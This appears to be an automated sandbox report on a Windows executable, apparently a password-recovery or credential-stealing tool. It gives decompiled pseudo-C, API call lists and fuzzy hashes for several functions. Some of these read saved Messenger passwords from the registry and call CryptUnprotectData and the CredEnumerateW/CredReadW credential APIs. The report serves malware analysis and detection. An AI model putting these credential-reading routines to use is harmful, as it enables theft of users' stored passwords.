                                						_t50 = E00408BF9(_t62,  &_a4160);
                                						_pop(_t57);
                                						if(_t50 != 0) {
                                							if(_v0 != 0) {
                                								0x413cf4( &_a4160, _v0);
                                								_pop(_t57);
                                							}
                                							ModifyMenuA(_a8, _v4, 0x400, _t62,  &_a4160);
                                						}
                                						goto L12;
                                						L14:
                                						_v4 = _v4 + 1;
                                						_t38 = _v4;
                                					} while (_t38 < _a4);
                                					goto L15;
                                				}
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                • String ID: 0$6
                                • API String ID: 3540791495-3849865405
                                • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
                                • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 93%
                                			E0040C1E0(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                				void* _v8;
                                				intOrPtr _v20;
                                				void* _v24;
                                				void* _v28;
                                				void* __ebx;
                                				void* __esi;
                                				signed int _t44;
                                				signed int _t45;
                                				intOrPtr _t47;
                                				signed int _t52;
                                				intOrPtr _t81;
                                				signed char _t85;
                                				intOrPtr _t87;
                                				intOrPtr _t89;
                                				void* _t90;
                                				void* _t91;
                                
                                				_t83 = __ecx;
                                				_t87 = _a4;
                                				_t91 = _t87 - 0x402;
                                				_t90 = __ecx;
                                				if(_t91 > 0) {
                                					_t44 = _t87 - 0x415;
                                					__eflags = _t44;
                                					if(_t44 == 0) {
                                						_t45 = E00402942();
                                						__eflags = _t45;
                                						if(_t45 != 0) {
                                							L24:
                                							if(_t87 ==  *((intOrPtr*)(_t90 + 0x394))) {
                                								_t79 = _a12;
                                								_t85 =  *(_a12 + 0xc);
                                								_t47 =  *((intOrPtr*)(_t90 + 0x390));
                                								if((_t85 & 0x00000008) == 0) {
                                									__eflags = _t85 & 0x00000040;
                                									if((_t85 & 0x00000040) != 0) {
                                										 *0x41e1f4 =  *0x41e1f4 & 0x00000000;
                                										__eflags =  *0x41e1f4;
                                										SetFocus( *(_t47 + 0x184));
                                									}
                                								} else {
                                									E0040AAE2(_t47, _t79);
                                								}
                                							}
                                							return E00402E97(_t90, _t87, _a8, _a12);
                                						}
                                						E0040B1EC(__ecx);
                                						L23:
                                						E0040AFE6(_t83, _t90, __eflags, 0);
                                						goto L24;
                                					}
                                					_t52 = _t44 - 1;
                                					__eflags = _t52;
                                					if(_t52 == 0) {
                                						E0040B2B5(__ecx);
                                						goto L23;
                                					}
                                					__eflags = _t52 == 6;
                                					if(_t52 == 6) {
                                						SetFocus( *(__ecx + 0x174));
                                					}
                                					goto L24;
                                				}
                                				if(_t91 == 0) {
                                					 *(__ecx + 0x178) =  *(__ecx + 0x178) & 0x00000000;
                                					E0040B15B(__ecx);
                                					goto L23;
                                				}
                                				if(_t87 == 0x1c) {
                                					__eflags = _a8;
                                					if(_a8 == 0) {
                                						 *((intOrPtr*)(_t90 + 0x174)) = GetFocus();
                                					} else {
                                						E00402F49(__ecx, 0x41c);
                                					}
                                					goto L24;
                                				}
                                				if(_t87 == 0x20) {
                                					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                						goto L24;
                                					}
                                					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
                                					return 1;
                                				}
                                				if(_t87 == 0x2b) {
                                					_t81 = _a12;
                                					__eflags =  *((intOrPtr*)(_t81 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                					if( *((intOrPtr*)(_t81 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                						SetBkMode( *(_t81 + 0x18), 1);
                                						SetTextColor( *(_t81 + 0x18), 0xff0000);
                                						_v8 = SelectObject( *(_t81 + 0x18),  *(__ecx + 0x388));
                                						asm("stosd");
                                						asm("stosd");
                                						asm("stosd");
                                						asm("stosd");
                                						_t89 = _a12;
                                						_v28 = 0x14;
                                						_v20 = 5;
                                						DrawTextExA( *(_t89 + 0x18), __ecx + 0x285, 0xffffffff, _t89 + 0x1c, 4,  &_v28);
                                						SelectObject( *(_t89 + 0x18), _v8);
                                						_t87 = _a4;
                                					}
                                				} else {
                                					if(_t87 == 0x7b) {
                                						_t86 = _a8;
                                						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x390)) + 0x184))) {
                                							E0040C01D(__ecx, _t86);
                                						}
                                					}
                                				}
                                				goto L24;
                                			}

                                APIs
                                • SetBkMode.GDI32(?,00000001), ref: 0040C259
                                • SetTextColor.GDI32(?,00FF0000), ref: 0040C267
                                • SelectObject.GDI32(?,?), ref: 0040C27C
                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
                                • SelectObject.GDI32(00000014,?), ref: 0040C2BD
                                  • Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
                                  • Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
                                  • Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066
                                • LoadCursorA.USER32(00000067), ref: 0040C2DE
                                • SetCursor.USER32(00000000), ref: 0040C2E5
                                • SetFocus.USER32(?), ref: 0040C33A
                                • SetFocus.USER32(?), ref: 0040C394
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
                                • String ID:
                                • API String ID: 4166086388-0
                                • Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                • Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
                                • Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                • Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E004037A2(char* __edi, long long __fp0) {
                                				char _v8;
                                				signed int _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v24;
                                				signed int _v28;
                                				signed int _v32;
                                				int _v40;
                                				long long _v44;
                                				long long _v52;
                                				signed int _v56;
                                				intOrPtr _v60;
                                				signed int _v64;
                                				char _v68;
                                				int _t79;
                                				char _t80;
                                				signed int _t95;
                                				int _t99;
                                				int _t101;
                                				void* _t104;
                                				void* _t105;
                                				intOrPtr _t114;
                                				char _t116;
                                				char* _t117;
                                				void* _t118;
                                				long long _t119;
                                				long long* _t120;
                                				long long _t154;
                                				long long _t160;
                                
                                				_t154 = __fp0;
                                				_t117 = __edi;
                                				_t79 = strlen(__edi);
                                				asm("fldz");
                                				_t104 = 0;
                                				_v52 = __fp0;
                                				_t118 = 0;
                                				_pop(_t105);
                                				_v40 = _t79;
                                				_v16 = 0;
                                				_v20 = 0;
                                				_v24 = 0;
                                				_v28 = 0;
                                				_v12 = 0;
                                				_v32 = 0;
                                				_v60 = 0x20;
                                				_v68 = 0;
                                				_v56 = 0;
                                				_v64 = 0;
                                				if(_t79 <= 0) {
                                					L43:
                                					_v8 = _t104;
                                					_t80 = 0x1a;
                                					if(_v16 != _t104) {
                                						_v8 = _t80;
                                					}
                                					if(_v20 != _t104) {
                                						_v8 = _v8 + _t80;
                                					}
                                					if(_v24 != _t104) {
                                						_v8 = _v8 + 0xa;
                                					}
                                					if(_v28 != _t104) {
                                						_v8 = _v8 + 0x10;
                                					}
                                					if(_v12 != _t104) {
                                						_v8 = _v8 + 0x11;
                                					}
                                					if(_v32 != _t104) {
                                						_v8 = _v8 + 0x1e;
                                					}
                                					if(_v8 <= _t104) {
                                						if(_v68 != _t104) {
                                							0x413de6(_v68);
                                						}
                                						return 0;
                                					} else {
                                						asm("fild dword [ebp-0x4]");
                                						 *_t120 = _t154;
                                						0x413d68(_t105, _t105);
                                						_v44 = _t154;
                                						 *_t120 =  *0x4196e8;
                                						0x413d68();
                                						asm("fdivr qword [ebp-0x28]");
                                						asm("fistp qword [ebp-0x30]");
                                						_t119 = _v52;
                                						if(_v68 != _t104) {
                                							0x413de6(_v68);
                                						}
                                						return _t119;
                                					}
                                				} else {
                                					goto L1;
                                				}
                                				do {
                                					L1:
                                					_t116 =  *((intOrPtr*)(_t118 + _t117));
                                					_v8 = _t116;
                                					if(_t116 - 0x41 <= 0x19) {
                                						_v16 = _v16 + 1;
                                					}
                                					if(_t116 - 0x61 <= 0x19) {
                                						_v20 = _v20 + 1;
                                					}
                                					if(_t116 - 0x30 <= 9) {
                                						_v24 = _v24 + 1;
                                					}
                                					if(_t116 - 0x20 <= 0xf) {
                                						_v28 = _v28 + 1;
                                					}
                                					if(_t116 - 0x3a <= 6) {
                                						_v12 = _v12 + 1;
                                					}
                                					if(_t116 - 0x5b <= 5) {
                                						_v12 = _v12 + 1;
                                					}
                                					if(_t116 < 0x7b) {
                                						L16:
                                						if(_t116 <= 0x7e) {
                                							goto L18;
                                						}
                                						goto L17;
                                					} else {
                                						if(_t116 > 0x7e) {
                                							L17:
                                							_v32 = _v32 + 1;
                                							L18:
                                							if(_t118 != _t104) {
                                								_t95 = 0;
                                								if(_v56 <= 0) {
                                									L27:
                                									_t95 = _t95 | 0xffffffff;
                                									L28:
                                									_t104 = 0;
                                									if(_t95 < 0) {
                                										E004040C3( &_v68, _v8);
                                										_t99 = abs( *((char*)(_t118 + _t117)) -  *((char*)(_t118 + _t117 - 1)));
                                										_pop(_t105);
                                										if(_t99 != 1) {
                                											_t47 = _t99 - 2; // -2
                                											_t105 = _t47;
                                											if(_t105 > 3) {
                                												if(_t99 < 6) {
                                													if(_t99 <= 0xa) {
                                														goto L42;
                                													}
                                													L40:
                                													_t154 = _v52 +  *0x4196f0;
                                													L41:
                                													_v52 = _t154;
                                													goto L42;
                                												}
                                												if(_t99 > 0xa) {
                                													goto L40;
                                												}
                                												_t154 = _v52 +  *0x4196f8;
                                												goto L41;
                                											}
                                											_t154 = _v52 +  *0x419700;
                                											goto L41;
                                										}
                                										_t160 = _v52;
                                										L30:
                                										_t154 = _t160 +  *0x419710;
                                										goto L41;
                                									}
                                									_t101 = abs(_t116 -  *((char*)(_t118 + _t117 - 1)));
                                									_t160 = _v52;
                                									_pop(_t105);
                                									if(_t101 != 0) {
                                										_t154 = _t160 +  *0x419708;
                                										goto L41;
                                									}
                                									goto L30;
                                								}
                                								L21:
                                								L21:
                                								if(_t95 < 0 || _t95 >= _v56) {
                                									_t114 = 0;
                                								} else {
                                									_t114 =  *((intOrPtr*)(_t95 + _v68));
                                								}
                                								if(_t114 == _t116) {
                                									goto L28;
                                								}
                                								_t95 = _t95 + 1;
                                								if(_t95 < _v56) {
                                									goto L21;
                                								}
                                								goto L27;
                                							}
                                							E004040C3( &_v68, _v8);
                                							goto L40;
                                						}
                                						_v12 = _v12 + 1;
                                						goto L16;
                                					}
                                					L42:
                                					_t118 = _t118 + 1;
                                				} while (_t118 < _v40);
                                				goto L43;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@$strlen
                                • String ID:
                                • API String ID: 4288758904-3916222277
                                • Opcode ID: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                • Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
                                • Opcode Fuzzy Hash: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                • Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,75D6F420,00000000), ref: 0040FE8C
                                • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memcpy.MSVCRT ref: 0040FEFE
                                • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
                                • RegCloseKey.ADVAPI32(?), ref: 0040FF79
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                • API String ID: 2372935584-105384665
                                • Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                • Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
                                • Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                • Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00404D7A(void* __ecx) {
                                				intOrPtr _v8;
                                				char _v12;
                                				struct HWND__* _t7;
                                				_Unknown_base(*)()* _t12;
                                				struct HWND__* _t16;
                                				void* _t21;
                                				struct HINSTANCE__* _t24;
                                
                                				_v12 = 8;
                                				_v8 = 0xff;
                                				_t16 = 0;
                                				_t21 = 0;
                                				_t24 = LoadLibraryA("comctl32.dll");
                                				if(_t24 == 0) {
                                					L5:
                                					 *0x415038();
                                					_t7 = 1;
                                					L6:
                                					if(_t7 != 0) {
                                						return 1;
                                					} else {
                                						MessageBoxA(_t7, "Error: Cannot load the common control classes.", "Error", 0x30);
                                						return 0;
                                					}
                                				}
                                				_t12 = GetProcAddress(_t24, "InitCommonControlsEx");
                                				if(_t12 != 0) {
                                					_t21 = 1;
                                					_t16 =  *_t12( &_v12);
                                				}
                                				FreeLibrary(_t24);
                                				if(_t21 == 0) {
                                					goto L5;
                                				} else {
                                					_t7 = _t16;
                                					goto L6;
                                				}
                                			}











                                APIs
                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E00406735(long __edi, intOrPtr _a4) {
                                				char _v8;
                                				void* _t8;
                                				void* _t9;
                                				long _t12;
                                				long _t22;
                                
                                				_t22 = __edi;
                                				_t8 = 0;
                                				_t12 = 0x1100;
                                				if(__edi - 0x834 <= 0x383) {
                                					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                					if(0 != 0) {
                                						_t12 = 0x1900;
                                					}
                                				}
                                				_t9 = FormatMessageA(_t12, _t8, _t22, 0x400,  &_v8, 0, 0);
                                				if(_t9 <= 0) {
                                					0x413d0c(_a4, "Unknown Error");
                                				} else {
                                					if(strlen(_v8) < 0x400) {
                                						0x413d0c(_a4, _v8);
                                					}
                                					_t9 = LocalFree(_v8);
                                				}
                                				return _t9;
                                			}









                                APIs
                                • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
                                • strlen.MSVCRT ref: 00406785
                                • _mbscpy.MSVCRT ref: 00406795
                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
                                • _mbscpy.MSVCRT ref: 004067AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                • String ID: Unknown Error$netmsg.dll
                                • API String ID: 2881943006-572158859
                                • Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                • Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
                                • Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                • Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00404109(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                				void* __esi;
                                				struct HINSTANCE__* _t10;
                                				_Unknown_base(*)()* _t14;
                                				struct HINSTANCE__** _t19;
                                
                                				_t19 = __eax;
                                				E00404170(__eax);
                                				_t10 = LoadLibraryA("advapi32.dll");
                                				 *_t19 = _t10;
                                				if(_t10 != 0) {
                                					_t19[2] = GetProcAddress(_t10, "CredReadW");
                                					_t19[3] = GetProcAddress( *_t19, "CredFree");
                                					_t14 = GetProcAddress( *_t19, "CredEnumerateW");
                                					_t19[4] = _t14;
                                					if(_t19[2] == 0 || _t19[3] == 0 || _t14 == 0) {
                                						E00404170(_t19);
                                					} else {
                                						_t19[1] = 1;
                                					}
                                				}
                                				return _t19[1];
                                			}








                                APIs
                                  • Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,75D6F420), ref: 00404177
                                • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75D6F420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                • GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
                                • API String ID: 2449869053-331516685
                                • Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                • Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
                                • Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                • Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 43%
                                			E0040955A(void* __eax, void* __eflags, signed int _a4, short _a8) {
                                				void* _v8;
                                				signed int _v12;
                                				signed int _v16;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				signed int _t96;
                                				signed int _t98;
                                				void* _t99;
                                				signed int _t104;
                                				signed short _t107;
                                				signed int _t110;
                                				intOrPtr _t114;
                                				signed int _t117;
                                				signed int _t119;
                                				signed short _t121;
                                				signed int _t122;
                                				signed int _t152;
                                				signed int _t156;
                                				signed int _t158;
                                				signed int _t161;
                                				signed int _t163;
                                				signed int _t168;
                                				signed int _t169;
                                				signed int _t170;
                                				void* _t172;
                                				void* _t173;
                                				void* _t174;
                                				void* _t178;
                                				intOrPtr _t180;
                                
                                				_t174 = __eflags;
                                				_t172 = __eax;
                                				E00409370(__eax);
                                				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
                                				_t122 = 5;
                                				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
                                				_t156 = 0x14;
                                				_t96 = _t122 * _t156;
                                				 *(_t172 + 0x1b0) = _t122;
                                				0x413d5c( ~(0 | _t174 > 0x00000000) | _t96);
                                				 *(_t172 + 0x1b4) = _t96;
                                				_t158 = 0x10;
                                				_t98 = _t122 * _t158;
                                				0x413d5c( ~(0 | _t174 > 0x00000000) | _t98);
                                				 *(_t172 + 0x34) = _t98;
                                				_v8 = 0x41b8d8;
                                				do {
                                					_t99 = _v8;
                                					_t168 =  *_t99;
                                					_v12 = _t168;
                                					_t169 = _t168 * 0x14;
                                					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
                                					_t104 = _v12 << 4;
                                					_v12 = _t104;
                                					memcpy( *(_t172 + 0x34) + _t104, _v8 + 0x14, 0x10);
                                					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
                                					_t173 = _t173 + 0x18;
                                					_v16 = _t107;
                                					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
                                					if((_t107 & 0xffff0000) == 0) {
                                						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E0040876F(_t107 & 0x0000ffff);
                                						_t121 = E0040876F(_v16 | 0x00010000);
                                						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
                                						_t122 = 5;
                                					}
                                					_v8 = _v8 + 0x24;
                                					_t178 = _v8 - 0x41b98c;
                                				} while (_t178 < 0);
                                				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
                                				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
                                				_t161 = 4;
                                				_t110 = _t122 * _t161;
                                				 *(_t172 + 0x20) = _t122;
                                				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
                                				0x413d5c( ~(0 | _t178 > 0x00000000) | _t110);
                                				 *(_t172 + 0x24) = _t110;
                                				0x413d5c(0xc);
                                				_t170 = _t110;
                                				if(_t170 == 0) {
                                					_t170 = 0;
                                					__eflags = 0;
                                				} else {
                                					_t114 =  *((intOrPtr*)(_t172 + 0x48));
                                					_t180 = _t114;
                                					_a8 = _t114;
                                					if(_t180 == 0) {
                                						_a8 = 0x64;
                                					}
                                					 *((intOrPtr*)(_t170 + 8)) = _a4;
                                					_t163 = 4;
                                					_t117 = _t122 * _t163;
                                					 *(_t170 + 4) = _t122;
                                					0x413d5c( ~(0 | _t180 > 0x00000000) | _t117);
                                					_a4 = _a4 & 0x00000000;
                                					 *_t170 = _t117;
                                					do {
                                						_t152 = _a4;
                                						_t119 = _t152 << 2;
                                						_a4 = _a4 + 1;
                                						 *( *_t170 + _t119 + 2) = _t152;
                                						 *((short*)(_t119 +  *_t170)) = _a8;
                                					} while (_a4 < _t122);
                                				}
                                				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                				 *(_t172 + 0x1a0) = _t170;
                                				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                				return E004094DA(_t172);
                                			}


































                                APIs
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                • ??2@YAPAXI@Z.MSVCRT ref: 00409591
                                • ??2@YAPAXI@Z.MSVCRT ref: 004095AD
                                • memcpy.MSVCRT ref: 004095D5
                                • memcpy.MSVCRT ref: 004095F2
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040967B
                                • ??2@YAPAXI@Z.MSVCRT ref: 00409685
                                • ??2@YAPAXI@Z.MSVCRT ref: 004096BD
                                  • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
                                  • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                  • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                  • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                • String ID: $$d
                                • API String ID: 2915808112-2066904009
                                • Opcode ID: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                • Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
                                • Opcode Fuzzy Hash: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
                                • Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004107B0,00000000,00000000), ref: 0041138D
                                • EnumProcessModules.PSAPI(00000000,?,00004000,004107B0,?,004107B0,00000000,00000000), ref: 004113AF
                                • memset.MSVCRT ref: 004113EA
                                • memset.MSVCRT ref: 004113FC
                                • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,00000104), ref: 00411429
                                  • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                • GetModuleInformation.PSAPI(00000000,?,?,0000000C), ref: 0041144F
                                • memset.MSVCRT ref: 004114E3
                                • _mbscpy.MSVCRT ref: 00411508
                                • CloseHandle.KERNEL32(00000000,004107B0,?), ref: 00411552
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ModuleProcess_mbscpy$CloseEnumFileHandleInformationModulesNameOpen
                                • String ID:
                                • API String ID: 3697563772-0
                                • Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                • Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
                                • Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
                                • Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetParent.USER32(00000000), ref: 004134D2
                                • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
                                • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
                                • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
                                • GetWindowRect.USER32(00000000,?), ref: 0041351F
                                • CopyRect.USER32(?,?), ref: 00413533
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
                                • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
